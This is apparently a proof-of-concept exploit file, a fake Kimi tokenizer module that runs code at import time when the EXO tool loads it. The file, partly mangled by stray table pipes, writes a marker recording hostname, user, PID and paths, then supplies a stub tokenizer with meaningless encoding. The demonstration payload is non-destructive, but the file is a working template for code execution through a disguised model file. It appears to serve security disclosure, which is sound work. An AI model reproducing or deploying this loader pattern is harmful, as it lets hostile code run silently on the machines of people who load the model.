| | |
| | |
| | |
| | |
| |
|
| | import os |
| | import sys |
| | from pathlib import Path |
| |
|
| | |
| | |
| | |
# Path of the proof-of-execution marker file written by execute_payload().
POC_MARKER_FILE = "/tmp/exo_poc_marker.txt"
| |
|
def execute_payload():
    """
    Proof-of-execution: writes a marker file with basic context info.
    Non-destructive — only creates one small file under /tmp.
    """
    try:
        # Assemble the marker body line by line, then join with newlines.
        report_lines = [
            "=== EXO RCE PoC - Code Execution Confirmed ===",
            f"Hostname: {os.uname().nodename}",
            f"User: {os.getenv('USER', 'unknown')}",
            f"PID: {os.getpid()}",
            f"Python: {sys.executable}",
            f"CWD: {os.getcwd()}",
        ]
        marker_path = Path(POC_MARKER_FILE)
        marker_path.write_text("\n".join(report_lines) + "\n")
        print(f"[PoC] tokenization_kimi executed — marker written to {POC_MARKER_FILE}")
    except Exception as exc:
        # Best-effort only: the PoC must never crash the importing process.
        print(f"[PoC] Could not write marker file: {exc}")


# Runs at import time: the module merely being loaded is the proof of execution.
execute_payload()
| |
|
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| |
|
| | class _InnerModel: |
| | """Minimal inner model that satisfies EXO's patched encode path.""" |
| | def encode(self, text: str, allowed_special=None) -> list: |
| | return [ord(c) % 128 for c in (text or "")] |
| |
|
| | def decode(self, tokens, errors="replace") -> str: |
| | return "".join(chr(t % 128) for t in tokens) |
| |
|
| |
|
class TikTokenTokenizer:
    """
    Stub TikTokenTokenizer to satisfy EXO's tokenizer loading expectations.
    The PoC payload has already executed by the time this class is instantiated.
    """

    def __init__(self, *args, **kwargs):
        # NOTE(review): the ids/specials look like real Kimi/Qwen values, but the
        # stub only needs them to be *present*, not correct — confirm if reused.
        shared_eos_id = 151643
        self.model = _InnerModel()
        self.eos_token_id = shared_eos_id
        self.bos_token_id = 151644
        self.pad_token_id = shared_eos_id
        self.eos_token = "<|im_end|>"
        self.bos_token = "<|im_start|>"
        print("[PoC] TikTokenTokenizer stub initialised")

    @classmethod
    def from_pretrained(cls, model_path, **kwargs):
        # The path is logged but otherwise ignored; every "model" is the same stub.
        print(f"[PoC] TikTokenTokenizer.from_pretrained called with: {model_path}")
        return cls()

    def encode(self, text: str, **kwargs) -> list:
        # Delegate to the inner model; extra kwargs are accepted and dropped.
        return self.model.encode(text)

    def decode(self, tokens, **kwargs) -> str:
        # Delegate to the inner model; extra kwargs are accepted and dropped.
        return self.model.decode(tokens)
| |
|
| |
|
# Import-time breadcrumb confirming the module body ran to completion.
print("[PoC] tokenization_kimi.py loaded successfully")
| |
|